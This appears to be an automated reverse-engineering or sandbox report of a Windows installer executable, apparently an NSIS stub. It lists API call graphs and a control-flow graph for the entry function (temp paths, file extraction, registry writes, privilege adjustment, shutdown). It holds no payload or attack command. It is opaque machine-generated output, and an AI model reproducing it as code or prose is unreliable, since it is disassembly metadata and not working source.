ShowWindow 3417->3422 3423 40591f 3417->3423 3424 404527 8 API calls 3418->3424 3457 4044f5 SendMessageW 3419->3457 3420->3418 3426 405979 SendMessageW 3420->3426 3429 405965 3422->3429 3430 405957 3422->3430 3427 404499 SendMessageW 3423->3427 3428 40593e 3424->3428 3431 40580b 3425->3431 3432 4057ef SendMessageW SendMessageW 3425->3432 3426->3428 3433 405992 CreatePopupMenu 3426->3433 3427->3418 3437 404499 SendMessageW 3429->3437 3458 4055c6 3430->3458 3434 405810 SendMessageW 3431->3434 3435 40581e 3431->3435 3432->3431 3438 40657e 21 API calls 3433->3438 3434->3435 3439 4044c0 22 API calls 3435->3439 3437->3420 3440 4059a2 AppendMenuW 3438->3440 3441 40582e 3439->3441 3442 4059d2 TrackPopupMenu 3440->3442 3443 4059bf GetWindowRect 3440->3443 3444 405837 ShowWindow 3441->3444 3445 40586b GetDlgItem SendMessageW 3441->3445 3442->3428 3446 4059ed 3442->3446 3443->3442 3447 40585a 3444->3447 3448 40584d ShowWindow 3444->3448 3445->3428 3449 405892 SendMessageW SendMessageW 3445->3449 3450 405a09 SendMessageW 3446->3450 3456 4044f5 SendMessageW 3447->3456 3448->3447 3449->3428 3450->3450 3451 405a26 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3450->3451 3453 405a4b SendMessageW 3451->3453 3453->3453 3454 405a74 GlobalUnlock SetClipboardData CloseClipboard 3453->3454 3454->3428 3455->3416 3456->3445 3457->3417 3459 4055e1 3458->3459 3467 405683 3458->3467 3460 4055fd lstrlenW 3459->3460 3461 40657e 21 API calls 3459->3461 3462 405626 3460->3462 3463 40560b lstrlenW 3460->3463 3461->3460 3465 405639 3462->3465 3466 40562c SetWindowTextW 3462->3466 3464 40561d lstrcatW 3463->3464 3463->3467 3464->3462 3465->3467 3468 40563f SendMessageW SendMessageW SendMessageW 3465->3468 3466->3465 3467->3429 3468->3467 3470 40450c SendMessageW 3469->3470 3471 4056bc 3470->3471 3474 401389 2 API calls 3471->3474 3475 4056e3 3471->3475 3472 40450c SendMessageW 3473 4056f5 CoUninitialize 3472->3473 3474->3471 3475->3472 4454 404d07 4455 404d33 4454->4455 4456 404d17 4454->4456 4458 404d66 4455->4458 4459 404d39 SHGetPathFromIDListW 4455->4459 4465 405b85 GetDlgItemTextW 4456->4465 4461 404d50 SendMessageW 4459->4461 4462 404d49 4459->4462 4460 404d24 SendMessageW 4460->4455 4461->4458 4464 40140b 2 API calls 4462->4464 4464->4461 4465->4460 4466 401588 4467 402bc9 4466->4467 4470 406488 wsprintfW 4467->4470 4469 402bce 4470->4469 4471 40198d 4472 402da9 21 API calls 4471->4472 4473 401994 4472->4473 4474 402da9 21 API calls 4473->4474 4475 4019a1 4474->4475 4476 402dcb 21 API calls 4475->4476 4477 4019b8 lstrlenW 4476->4477 4479 4019c9 4477->4479 4478 401a0a 4479->4478 4483 406541 lstrcpynW 4479->4483 4481 4019fa 4481->4478 4482 4019ff lstrlenW 4481->4482 4482->4478 4483->4481 4484 40168f 4485 402dcb 21 API calls 4484->4485 4486 401695 4485->4486 4487 40689e 2 API calls 4486->4487 4488 40169b 4487->4488 4489 402b10 4490 402da9 21 API calls 4489->4490 4491 402b16 4490->4491 4492 402953 4491->4492 4493 40657e 21 API calls 4491->4493 4493->4492 4494 402711 4495 402da9 21 API calls 4494->4495 4496 402720 4495->4496 4497 40276a ReadFile 4496->4497 4498 4060b4 ReadFile 4496->4498 4499 406112 5 API calls 4496->4499 4500 4027aa MultiByteToWideChar 4496->4500 4501 40285f 4496->4501 4503 4027d0 SetFilePointer MultiByteToWideChar 4496->4503 4504 402870 4496->4504 4506 40285d 4496->4506 4497->4496 4497->4506 4498->4496 4499->4496 4500->4496 4507 406488 wsprintfW 4501->4507 4503->4496 4505 402891 SetFilePointer 4504->4505 4504->4506 4505->4506 4507->4506 4508 401491 4509 4055c6 28 API calls 4508->4509 4510 401498 4509->4510 3774 401794 3775 402dcb 21 API calls 3774->3775 3776 40179b 3775->3776 3777 4017c3 3776->3777 3778 4017bb 3776->3778 3814 406541 lstrcpynW 3777->3814 3813 406541 lstrcpynW 3778->3813 3781 4017ce 3783 405e10 3 API calls 3781->3783 3782 4017c1 3785 4067ef 5 API calls 3782->3785 3784 4017d4 lstrcatW 3783->3784 3784->3782 3787 4017e0 3785->3787 3786 40689e 2 API calls 3786->3787 3787->3786 3788 40600c 2 API calls 3787->3788 3790 4017f2 CompareFileTime 3787->3790 3791 4018b2 3787->3791 3792 401889 3787->3792 3795 406541 lstrcpynW 3787->3795 3800 40657e 21 API calls 3787->3800 3812 406031 GetFileAttributesW CreateFileW 3787->3812 3815 405ba1 3787->3815 3788->3787 3790->3787 3793 4055c6 28 API calls 3791->3793 3794 4055c6 28 API calls 3792->3794 3802 40189e 3792->3802 3796 4018bc 3793->3796 3794->3802 3795->3787 3797 4032d9 39 API calls 3796->3797 3798 4018cf 3797->3798 3799 4018e3 SetFileTime 3798->3799 3801 4018f5 CloseHandle 3798->3801 3799->3801 3800->3787 3801->3802 3803 401906 3801->3803 3804 40190b 3803->3804 3805 40191e 3803->3805 3807 40657e 21 API calls 3804->3807 3806 40657e 21 API calls 3805->3806 3809 401926 3806->3809 3808 401913 lstrcatW 3807->3808 3808->3809 3811 405ba1 MessageBoxIndirectW 3809->3811 3811->3802 3812->3787 3813->3782 3814->3781 3816 405bb6 3815->3816 3817 405c02 3816->3817 3818 405bca MessageBoxIndirectW 3816->3818 3817->3787 3818->3817 4525 401a97 4526 402da9 21 API calls 4525->4526 4527 401aa0 4526->4527 4528 402da9 21 API calls 4527->4528 4529 401a45 4528->4529 4530 401598 4531 4015b1 4530->4531 4532 4015a8 ShowWindow 4530->4532 4533 402c4f 4531->4533 4534 4015bf ShowWindow 4531->4534 4532->4531 4534->4533 3858 402419 3859 402dcb 21 API calls 3858->3859 3860 402428 3859->3860 3861 402dcb 21 API calls 3860->3861 3862 402431 3861->3862 3863 402dcb 21 API calls 3862->3863 3864 40243b GetPrivateProfileStringW 3863->3864 4535 40201b 4536 402dcb 21 API calls 4535->4536 4537 402022 4536->4537 4538 40689e 2 API calls 4537->4538 4539 402028 4538->4539 4541 402039 4539->4541 4542 406488 wsprintfW 4539->4542 4542->4541 3865 40351c SetErrorMode GetVersionExW 3866 403570 GetVersionExW 3865->3866 3867 4035a8 3865->3867 3866->3867 3868 4035ff 3867->3868 3869 406935 5 API calls 3867->3869 3870 4068c5 3 API calls 3868->3870 3869->3868 3871 403615 lstrlenA 3870->3871 3871->3868 3872 403625 3871->3872 3873 406935 5 API calls 3872->3873 3874 40362c 3873->3874 3875 406935 5 API calls 3874->3875 3876 403633 3875->3876 3877 406935 5 API calls 3876->3877 3878 40363f #17 OleInitialize SHGetFileInfoW 3877->3878 3953 406541 lstrcpynW 3878->3953 3881 40368e GetCommandLineW 3954 406541 lstrcpynW 3881->3954 3883 4036a0 3884 405e3d CharNextW 3883->3884 3885 4036c6 CharNextW 3884->3885 3888 4036d8 3885->3888 3886 4037da 3887 4037ee GetTempPathW 3886->3887 3955 4034eb 3887->3955 3888->3886 3888->3888 3891 405e3d CharNextW 3888->3891 3900 4037dc 3888->3900 3890 403806 3892 403860 DeleteFileW 3890->3892 3893 40380a GetWindowsDirectoryW lstrcatW 3890->3893 3891->3888 3965 4030a2 GetTickCount GetModuleFileNameW 3892->3965 3895 4034eb 12 API calls 3893->3895 3897 403826 3895->3897 3896 403874 3898 40392b 3896->3898 3902 40391b 3896->3902 3906 405e3d CharNextW 3896->3906 3897->3892 3899 40382a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3897->3899 4054 403b39 3898->4054 3904 4034eb 12 API calls 3899->3904 4049 406541 lstrcpynW 3900->4049 3993 403c13 3902->3993 3908 403858 3904->3908 3920 403893 3906->3920 3908->3892 3908->3898 3909 403a79 3911 405ba1 MessageBoxIndirectW 3909->3911 3910 403a9d 3912 403b21 ExitProcess 3910->3912 3913 403aa5 GetCurrentProcess OpenProcessToken 3910->3913 3915 403a87 ExitProcess 3911->3915 3916 403af1 3913->3916 3917 403abd LookupPrivilegeValueW AdjustTokenPrivileges 3913->3917 3922 406935 5 API calls 3916->3922 3917->3916 3918 4038f1 3923 405f18 18 API calls 3918->3923 3919 403934 3921 405b0c 5 API calls 3919->3921 3920->3918 3920->3919 3924 403939 lstrlenW 3921->3924 3925 403af8 3922->3925 3926 4038fd 3923->3926 4052 406541 lstrcpynW 3924->4052 3928 403b0d ExitWindowsEx 3925->3928 3930 403b1a 3925->3930 3926->3898 4050 406541 lstrcpynW 3926->4050 3928->3912 3928->3930 3933 40140b 2 API calls 3930->3933 3931 403953 3934 40395c 3931->3934 3950 40396b 3931->3950 3932 403910 4051 406541 lstrcpynW 3932->4051 3933->3912 4053 406541 lstrcpynW 3934->4053 3937 403991 wsprintfW 3938 40657e 21 API calls 3937->3938 3938->3950 3939 405a95 2 API calls 3939->3950 3940 405aef 2 API calls 3940->3950 3941 403a07 SetCurrentDirectoryW 3943 406301 40 API calls 3941->3943 3942 4039cd GetFileAttributesW 3944 4039d9 DeleteFileW 3942->3944 3942->3950 3945 403a16 CopyFileW 3943->3945 3944->3950 3945->3898 3945->3950 3946 405c4d 71 API calls 3946->3950 3947 406301 40 API calls 3947->3950 3948 40657e 21 API calls 3948->3950 3949 405b24 2 API calls 3949->3950 3950->3898 3950->3937 3950->3939 3950->3940 3950->3941 3950->3942 3950->3946 3950->3947 3950->3948 3950->3949 3951 403a8f CloseHandle 3950->3951 3952 40689e 2 API calls 3950->3952 3951->3898 3952->3950 3953->3881 3954->3883 3956 4067ef 5 API calls 3955->3956 3958 4034f7 3956->3958 3957 403501 3957->3890 3958->3957 3959 405e10 3 API calls 3958->3959 3960 403509 3959->3960 3961 405aef 2 API calls 3960->3961 3962 40350f 3961->3962 4061 406060 3962->4061 4065 406031 GetFileAttributesW CreateFileW 3965->4065 3967 4030e2 3986 4030f2 3967->3986 4066 406541 lstrcpynW 3967->4066 3969 403108 3970 405e5c 2 API calls 3969->3970 3971 40310e 3970->3971 4067 406541 lstrcpynW 3971->4067 3973 403119 GetFileSize 3974 403213 3973->3974 3988 403130 3973->3988 4068 40303e 3974->4068 3976 40321c 3978 40324c GlobalAlloc 3976->3978 3976->3986 4080 4034d4 SetFilePointer 3976->4080 3977 4034be ReadFile 3977->3988 4079 4034d4 SetFilePointer 3978->4079 3980 40327f 3983 40303e 6 API calls 3980->3983 3982 403267 3985 4032d9 39 API calls 3982->3985 3983->3986 3984 403235 3987 4034be ReadFile 3984->3987 3991 403273 3985->3991 3986->3896 3989 403240 3987->3989 3988->3974 3988->3977 3988->3980 3988->3986 3990 40303e 6 API calls 3988->3990 3989->3978 3989->3986 3990->3988 3991->3986 3991->3991 3992 4032b0 SetFilePointer 3991->3992 3992->3986 3994 406935 5 API calls 3993->3994 3995 403c27 3994->3995 3996 403c2d 3995->3996 3997 403c3f 3995->3997 4089 406488 wsprintfW 3996->4089 3998 40640f 3 API calls 3997->3998 3999 403c6f 3998->3999 4000 403c8e lstrcatW 3999->4000 4002 40640f 3 API calls 3999->4002 4003 403c3d 4000->4003 4002->4000 4081 403ee9 4003->4081 4006 405f18 18 API calls 4007 403cc0 4006->4007 4008 403d54 4007->4008 4010 40640f 3 API calls 4007->4010 4009 405f18 18 API calls 4008->4009 4011 403d5a 4009->4011 4017 403cf2 4010->4017 4012 403d6a LoadImageW 4011->4012 4013 40657e 21 API calls 4011->4013 4014 403e10 4012->4014 4015 403d91 RegisterClassW 4012->4015 4013->4012 4019 40140b 2 API calls 4014->4019 4018 403dc7 SystemParametersInfoW CreateWindowExW 4015->4018 4048 403e1a 4015->4048 4016 403d13 lstrlenW 4021 403d21 lstrcmpiW 4016->4021 4022 403d47 4016->4022 4017->4008 4017->4016 4020 405e3d CharNextW 4017->4020 4018->4014 4023 403e16 4019->4023 4024 403d10 4020->4024 4021->4022 4025 403d31 GetFileAttributesW 4021->4025 4026 405e10 3 API calls 4022->4026 4028 403ee9 22 API calls 4023->4028 4023->4048 4024->4016 4027 403d3d 4025->4027 4029 403d4d 4026->4029 4027->4022 4030 405e5c 2 API calls 4027->4030 4031 403e27 4028->4031 4090 406541 lstrcpynW 4029->4090 4030->4022 4033 403e33 ShowWindow 4031->4033 4034 403eb6 4031->4034 4036 4068c5 3 API calls 4033->4036 4035 405699 5 API calls 4034->4035 4037 403ebc 4035->4037 4038 403e4b 4036->4038 4039 403ec0 4037->4039 4040 403ed8 4037->4040 4041 403e59 GetClassInfoW 4038->4041 4043 4068c5 3 API calls 4038->4043 4047 40140b 2 API calls 4039->4047 4039->4048 4042 40140b 2 API calls 4040->4042 4044 403e83 DialogBoxParamW 4041->4044 4045 403e6d GetClassInfoW RegisterClassW 4041->4045 4042->4048 4043->4041 4046 40140b 2 API calls 4044->4046 4045->4044 4046->4048 4047->4048 4048->3898 4049->3887 4050->3932 4051->3902 4052->3931 4053->3950 4055 403b51 4054->4055 4056 403b43 CloseHandle 4054->4056 4092 403b7e 4055->4092 4056->4055 4059 405c4d 71 API calls 4060 403a6c OleUninitialize 4059->4060 4060->3909 4060->3910 4062 40606d GetTickCount GetTempFileNameW 4061->4062 4063 40351a 4062->4063 4064 4060a3 4062->4064 4063->3890 4064->4062 4064->4063 4065->3967 4066->3969 4067->3973 4069 403047 4068->4069 4070 40305f 4068->4070 4071 403050 DestroyWindow 4069->4071 4072 403057 4069->4072 4073 403067 4070->4073 4074 40306f GetTickCount 4070->4074 4071->4072 4072->3976 4075 406971 2 API calls 4073->4075 4076 4030a0 4074->4076 4077 40307d CreateDialogParamW ShowWindow 4074->4077 4078 40306d 4075->4078 4076->3976 4077->4076 4078->3976 4079->3982 4080->3984 4082 403efd 4081->4082 4091 406488 wsprintfW 4082->4091 4084 403f6e 4085 403fa2 22 API calls 4084->4085 4087 403f73 4085->4087 4086 403c9e 4086->4006 4087->4086 4088 40657e 21 API calls 4087->4088 4088->4087 4089->4003 4090->4008 4091->4084 4093 403b8c 4092->4093 4094 403b56 4093->4094 4095 403b91 FreeLibrary GlobalFree 4093->4095 4094->4059 4095->4094 4095->4095 4550 401b9c 4551 402dcb 21 API calls 4550->4551 4552 401ba3 4551->4552 4553 402da9 21 API calls 4552->4553 4554 401bac wsprintfW 4553->4554 4555 402c4f 4554->4555 4556 40149e 4557 4014ac PostQuitMessage 4556->4557 4558 4023c2 4556->4558 4557->4558 4559 4016a0 4560 402dcb 21 API calls 4559->4560 4561 4016a7 4560->4561 4562 402dcb 21 API calls 4561->4562 4563 4016b0 4562->4563 4564 402dcb 21 API calls 4563->4564 4565 4016b9 MoveFileW 4564->4565 4566 4016c5 4565->4566 4567 4016cc 4565->4567 4569 401423 28 API calls 4566->4569 4568 40689e 2 API calls 4567->4568 4571 40231b 4567->4571 4570 4016db 4568->4570 4569->4571 4570->4571 4572 406301 40 API calls 4570->4572 4572->4566 4573 401a24 4574 402dcb 21 API calls 4573->4574 4575 401a2b 4574->4575 4576 402dcb 21 API calls 4575->4576 4577 401a34 4576->4577 4578 401a3b lstrcmpiW 4577->4578 4579 401a4d lstrcmpW 4577->4579 4580 401a41 4578->4580 4579->4580 4581 402324 4582 402dcb 21 API calls 4581->4582 4583 40232a 4582->4583 4584 402dcb 21 API calls 4583->4584 4585 402333 4584->4585 4586 402dcb 21 API calls 4585->4586 4587 40233c 4586->4587 4588 40689e 2 API calls 4587->4588 4589 402345 4588->4589 4590 402356 lstrlenW lstrlenW 4589->4590 4594 402349 4589->4594 4592 4055c6 28 API calls 4590->4592 4591 4055c6 28 API calls 4595 402351 4591->4595 4593 402394 SHFileOperationW 4592->4593 4593->4594 4593->4595 4594->4591 4594->4595 4596 401da6 4597 401db9 GetDlgItem 4596->4597 4598 401dac 4596->4598 4600 401db3 4597->4600 4599 402da9 21 API calls 4598->4599 4599->4600 4601 401dfa GetClientRect LoadImageW SendMessageW 4600->4601 4603 402dcb 21 API calls 4600->4603 4604 401e58 4601->4604 4606 401e64 4601->4606 4603->4601 4605 401e5d DeleteObject 4604->4605 4604->4606 4605->4606 4607 4023a8 4608 4023af 4607->4608 4611 4023c2 4607->4611 4609 40657e 21 API calls 4608->4609 4610 4023bc 4609->4610 4612 405ba1 MessageBoxIndirectW 4610->4612 4612->4611 4613 402c2a SendMessageW 4614 402c44 InvalidateRect 4613->4614 4615 402c4f 4613->4615 4614->4615 4623 404f2d GetDlgItem GetDlgItem 4624 404f7f 7 API calls 4623->4624 4628 4051a4 4623->4628 4625 405026 DeleteObject 4624->4625 4626 405019 SendMessageW 4624->4626 4627 40502f 4625->4627 4626->4625 4629 405066 4627->4629 4632 40657e 21 API calls 4627->4632 4640 405286 4628->4640 4652 405213 4628->4652 4677 404e7b SendMessageW 4628->4677 4630 4044c0 22 API calls 4629->4630 4633 40507a 4630->4633 4631 405332 4635 405344 4631->4635 4636 40533c SendMessageW 4631->4636 4637 405048 SendMessageW SendMessageW 4632->4637 4638 4044c0 22 API calls 4633->4638 4634 405197 4642 404527 8 API calls 4634->4642 4647 405356 ImageList_Destroy 4635->4647 4648 40535d 4635->4648 4653 40536d 4635->4653 4636->4635 4637->4627 4656 40508b 4638->4656 4639 4052df SendMessageW 4639->4634 4645 4052f4 SendMessageW 4639->4645 4640->4631 4640->4634 4640->4639 4641 405278 SendMessageW 4641->4640 4646 405533 4642->4646 4644 4054e7 4644->4634 4654 4054f9 ShowWindow GetDlgItem ShowWindow 4644->4654 4651 405307 4645->4651 4647->4648 4649 405366 GlobalFree 4648->4649 4648->4653 4649->4653 4650 405166 GetWindowLongW SetWindowLongW 4655 40517f 4650->4655 4662 405318 SendMessageW 4651->4662 4652->4640 4652->4641 4653->4644 4670 4053a8 4653->4670 4682 404efb 4653->4682 4654->4634 4657 405184 ShowWindow 4655->4657 4658 40519c 4655->4658 4656->4650 4661 4050de SendMessageW 4656->4661 4663 405161 4656->4663 4664 405130 SendMessageW 4656->4664 4665 40511c SendMessageW 4656->4665 4675 4044f5 SendMessageW 4657->4675 4676 4044f5 SendMessageW 4658->4676 4661->4656 4662->4631 4663->4650 4663->4655 4664->4656 4665->4656 4667 4054b2 4668 4054bd InvalidateRect 4667->4668 4671 4054c9 4667->4671 4668->4671 4669 4053d6 SendMessageW 4674 4053ec 4669->4674 4670->4669 4670->4674 4671->4644 4691 404e36 4671->4691 4673 405460 SendMessageW SendMessageW 4673->4674 4674->4667 4674->4673 4675->4634 4676->4628 4678 404eda SendMessageW 4677->4678 4679 404e9e GetMessagePos ScreenToClient SendMessageW 4677->4679 4680 404ed2 4678->4680 4679->4680 4681 404ed7 4679->4681 4680->4652 4681->4678 4694 406541 lstrcpynW 4682->4694 4684 404f0e 4695 406488 wsprintfW 4684->4695 4686 404f18 4687 40140b 2 API calls 4686->4687 4688 404f21 4687->4688 4696 406541 lstrcpynW 4688->4696 4690 404f28 4690->4670 4697 404d6d 4691->4697 4693 404e4b 4693->4644 4694->4684 4695->4686 4696->4690 4698 404d86 4697->4698 4699 40657e 21 API calls 4698->4699 4700 404dea 4699->4700 4701 40657e 21 API calls 4700->4701 4702 404df5 4701->4702 4703 40657e 21 API calls 4702->4703 4704 404e0b lstrlenW wsprintfW SetDlgItemTextW 4703->4704 4704->4693 3707 4024af 3708 402dcb 21 API calls 3707->3708 3709 4024c1 3708->3709 3710 402dcb 21 API calls 3709->3710 3711 4024cb 3710->3711 3724 402e5b 3711->3724 3714 402503 3717 40250f 3714->3717 3720 402da9 21 API calls 3714->3720 3715 402953 3716 402dcb 21 API calls 3719 4024f9 lstrlenW 3716->3719 3718 40252e RegSetValueExW 3717->3718 3728 4032d9 3717->3728 3722 402544 RegCloseKey 3718->3722 3719->3714 3720->3717 3722->3715 3725 402e76 3724->3725 3749 4063dc 3725->3749 3730 4032f2 3728->3730 3729 40331d 3753 4034be 3729->3753 3730->3729 3763 4034d4 SetFilePointer 3730->3763 3734 40333a GetTickCount 3745 40334d 3734->3745 3735 40345e 3736 403462 3735->3736 3741 40347a 3735->3741 3738 4034be ReadFile 3736->3738 3737 403448 3737->3718 3738->3737 3739 4034be ReadFile 3739->3741 3740 4034be ReadFile 3740->3745 3741->3737 3741->3739 3742 4060e3 WriteFile 3741->3742 3742->3741 3744 4033b3 GetTickCount 3744->3745 3745->3737 3745->3740 3745->3744 3746 4033dc MulDiv wsprintfW 3745->3746 3748 4060e3 WriteFile 3745->3748 3756 406ab0 3745->3756 3747 4055c6 28 API calls 3746->3747 3747->3745 3748->3745 3750 4063eb 3749->3750 3751 4024db 3750->3751 3752 4063f6 RegCreateKeyExW 3750->3752 3751->3714 3751->3715 3751->3716 3752->3751 3754 4060b4 ReadFile 3753->3754 3755 403328 3754->3755 3755->3734 3755->3735 3755->3737 3757 406ad5 3756->3757 3758 406add 3756->3758 3757->3745 3758->3757 3759 406b64 GlobalFree 3758->3759 3760 406b6d GlobalAlloc 3758->3760 3761 406be4 GlobalAlloc 3758->3761 3762 406bdb GlobalFree 3758->3762 3759->3760 3760->3757 3760->3758 3761->3757 3761->3758 3762->3761 3763->3729 3764 402930 3765 402dcb 21 API calls 3764->3765 3766 402937 FindFirstFileW 3765->3766 3767 40295f 3766->3767 3771 40294a 3766->3771 3768 402968 3767->3768 3772 406488 wsprintfW 3767->3772 3773 406541 lstrcpynW 3768->3773 3772->3768 3773->3771 4705 404630 lstrlenW 4706 404651 WideCharToMultiByte 4705->4706 4707 40464f 4705->4707 4707->4706 4708 401931 4709 401968 4708->4709 4710 402dcb 21 API calls 4709->4710 4711 40196d 4710->4711 4712 405c4d 71 API calls 4711->4712 4713 401976 4712->4713 4714 4049b1 4715 4049dd 4714->4715 4716 4049ee 4714->4716 4775 405b85 GetDlgItemTextW 4715->4775 4717 4049fa GetDlgItem 4716->4717 4750 404a59 4716->4750 4720 404a0e 4717->4720 4719 4049e8 4722 4067ef 5 API calls 4719->4722 4723 404a22 SetWindowTextW 4720->4723 4727 405ebb 4 API calls 4720->4727 4721 404b3d 4724 404cec 4721->4724 4777 405b85 GetDlgItemTextW 4721->4777 4722->4716 4728 4044c0 22 API calls 4723->4728 4726 404527 8 API calls 4724->4726 4731 404d00 4726->4731 4732 404a18 4727->4732 4733 404a3e 4728->4733 4729 40657e 21 API calls 4734 404acd SHBrowseForFolderW 4729->4734 4730 404b6d 4735 405f18 18 API calls 4730->4735 4732->4723 4739 405e10 3 API calls 4732->4739 4736 4044c0 22 API calls 4733->4736 4734->4721 4737 404ae5 CoTaskMemFree 4734->4737 4738 404b73 4735->4738 4740 404a4c 4736->4740 4741 405e10 3 API calls 4737->4741 4778 406541 lstrcpynW 4738->4778 4739->4723 4776 4044f5 SendMessageW 4740->4776 4743 404af2 4741->4743 4746 404b29 SetDlgItemTextW 4743->4746 4751 40657e 21 API calls 4743->4751 4745 404a52 4748 406935 5 API calls 4745->4748 4746->4721 4747 404b8a 4749 406935 5 API calls 4747->4749 4748->4750 4758 404b91 4749->4758 4750->4721 4750->4724 4750->4729 4752 404b11 lstrcmpiW 4751->4752 4752->4746 4754 404b22 lstrcatW 4752->4754 4753 404bd2 4779 406541 lstrcpynW 4753->4779 4754->4746 4756 404bd9 4757 405ebb 4 API calls 4756->4757 4759 404bdf GetDiskFreeSpaceW 4757->4759 4758->4753 4762 405e5c 2 API calls 4758->4762 4764 404c2a 4758->4764 4761 404c03 MulDiv 4759->4761 4759->4764 4761->4764 4762->4758 4763 404c9b 4766 404cbe 4763->4766 4768 40140b 2 API calls 4763->4768 4764->4763 4765 404e36 24 API calls 4764->4765 4767 404c88 4765->4767 4780 4044e2 KiUserCallbackDispatcher 4766->4780 4769 404c9d SetDlgItemTextW 4767->4769 4770 404c8d 4767->4770 4768->4766 4769->4763 4772 404d6d 24 API calls 4770->4772 4772->4763 4773 404cda 4773->4724 4774 40490a SendMessageW 4773->4774 4774->4724 4775->4719 4776->4745 4777->4730 4778->4747 4779->4756 4780->4773 4781 401934 4782 402dcb 21 API calls 4781->4782 4783 40193b 4782->4783 4784 405ba1 MessageBoxIndirectW 4783->4784 4785 401944 4784->4785 4786 4028b6 4787 4028bd 4786->4787 4789 402bce 4786->4789 4788 402da9 21 API calls 4787->4788 4790 4028c4 4788->4790 4791 4028d3 SetFilePointer 4790->4791 4791->4789 4792 4028e3 4791->4792 4794 406488 wsprintfW 4792->4794 4794->4789 4795 401f37 4796 402dcb 21 API calls 4795->4796 4797 401f3d 4796->4797 4798 402dcb 21 API calls 4797->4798 4799 401f46 4798->4799 4800 402dcb 21 API calls 4799->4800 4801 401f4f 4800->4801 4802 402dcb 21 API calls 4801->4802 4803 401f58 4802->4803 4804 401423 28 API calls 4803->4804 4805 401f5f 4804->4805 4812 405b67 ShellExecuteExW 4805->4812 4807 401fa7 4808 4069e0 5 API calls 4807->4808 4809 402953 4807->4809 4810 401fc4 CloseHandle 4808->4810 4810->4809 4812->4807 4813 402fb8 4814 402fca SetTimer 4813->4814 4816 402fe3 4813->4816 4814->4816 4815 403038 4816->4815 4817 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4816->4817 4817->4815 4818 4014b8 4819 4014be 4818->4819 4820 401389 2 API calls 4819->4820 4821 4014c6 4820->4821 4822 40553a 4823 40554a 4822->4823 4824 40555e 4822->4824 4825 405550 4823->4825 4826 4055a7 4823->4826 4827 405566 IsWindowVisible 4824->4827 4833 40557d 4824->4833 4829 40450c SendMessageW 4825->4829 4828 4055ac CallWindowProcW 4826->4828 4827->4826 4830 405573 4827->4830 4831 40555a 4828->4831 4829->4831 4832 404e7b 5 API calls 4830->4832 4832->4833 4833->4828 4834 404efb 4 API calls 4833->4834 4834->4826 4835 401d3c 4836 402da9 21 API calls 4835->4836 4837 401d42 IsWindow 4836->4837 4838 401a45 4837->4838

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 0 40351c-40356e SetErrorMode GetVersionExW 1 403570-4035a0 GetVersionExW 0->1 2 4035a8-4035ad 0->2 1->2 3 4035b5-4035f7 2->3 4 4035af 2->4 5 4035f9-403601 call 406935 3->5 6 40360a 3->6 4->3 5->6 11 403603 5->11 8 40360f-403623 call 4068c5 lstrlenA 6->8 13 403625-403641 call 406935 * 3 8->13 11->6 20 403652-4036b6 #17 OleInitialize SHGetFileInfoW call 406541 GetCommandLineW call 406541 13->20 21 403643-403649 13->21 28 4036b8-4036ba 20->28 29 4036bf-4036d3 call 405e3d CharNextW 20->29 21->20 25 40364b 21->25 25->20 28->29 32 4037ce-4037d4 29->32 33 4036d8-4036de 32->33 34 4037da 32->34 36 4036e0-4036e5 33->36 37 4036e7-4036ee 33->37 35 4037ee-403808 GetTempPathW call 4034eb 34->35 47 403860-40387a DeleteFileW call 4030a2 35->47 48 40380a-403828 GetWindowsDirectoryW lstrcatW call 4034eb 35->48 36->36 36->37 38 4036f0-4036f5 37->38 39 4036f6-4036fa 37->39 38->39 41 403700-403706 39->41 42 4037bb-4037ca call 405e3d 39->42 45 403720-403759 41->45 46 403708-40370f 41->46 42->32 56 4037cc-4037cd 42->56 53 403776-4037b0 45->53 54 40375b-403760 45->54 51 403711-403714 46->51 52 403716 46->52 62 403880-403886 47->62 63 403a67-403a77 call 403b39 OleUninitialize 47->63 48->47 66 40382a-40385a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034eb 48->66 51->45 51->52 52->45 60 4037b2-4037b6 53->60 61 4037b8-4037ba 53->61 54->53 58 403762-40376a 54->58 56->32 64 403771 58->64 65 40376c-40376f 58->65 60->61 67 4037dc-4037e9 call 406541 60->67 61->42 69 40388c-403897 call 405e3d 62->69 70 40391f-403926 call 403c13 62->70 77 403a79-403a89 call 405ba1 ExitProcess 63->77 78 403a9d-403aa3 63->78 64->53 65->53 65->64 66->47 66->63 67->35 82 4038e5-4038ef 69->82 83 403899-4038ce 69->83 80 40392b-40392f 70->80 84 403b21-403b29 78->84 85 403aa5-403abb GetCurrentProcess OpenProcessToken 78->85 80->63 92 4038f1-4038ff call 405f18 82->92 93 403934-40395a call 405b0c lstrlenW call 406541 82->93 89 4038d0-4038d4 83->89 86 403b2b 84->86 87 403b2f-403b33 ExitProcess 84->87 90 403af1-403aff call 406935 85->90 91 403abd-403aeb LookupPrivilegeValueW AdjustTokenPrivileges 85->91 86->87 94 4038d6-4038db 89->94 95 4038dd-4038e1 89->95 105 403b01-403b0b 90->105 106 403b0d-403b18 ExitWindowsEx 90->106 91->90 92->63 103 403905-40391b call 406541 * 2 92->103 112 40396b-403983 93->112 113 40395c-403966 call 406541 93->113 94->95 99 4038e3 94->99 95->89 95->99 99->82 103->70 105->106 108 403b1a-403b1c call 40140b 105->108 106->84 106->108 108->84 115 403988-40398c 112->115 113->112 118 403991-4039bb wsprintfW call 40657e 115->118 122 4039c4 call 405aef 118->122 123 4039bd-4039c2 call 405a95 118->123 127 4039c9-4039cb 122->127 123->127 128 403a07-403a26 SetCurrentDirectoryW call 406301 CopyFileW 127->128 129 4039cd-4039d7 GetFileAttributesW 127->129 136 403a65 128->136 137 403a28-403a49 call 406301 call 40657e call 405b24 128->137 131 4039f8-403a03 129->131 132 4039d9-4039e2 DeleteFileW 129->132 131->115 133 403a05 131->133 132->131 135 4039e4-4039f6 call 405c4d 132->135 133->63 135->118 135->131 136->63 146 403a4b-403a55 137->146 147 403a8f-403a9b CloseHandle 137->147 146->136 148 403a57-403a5f call 40689e 146->148 147->136 148->118 148->136
                                                                                                                                                            APIs
                                                                                                                                                            • SetErrorMode.KERNELBASE ref: 0040353F
                                                                                                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
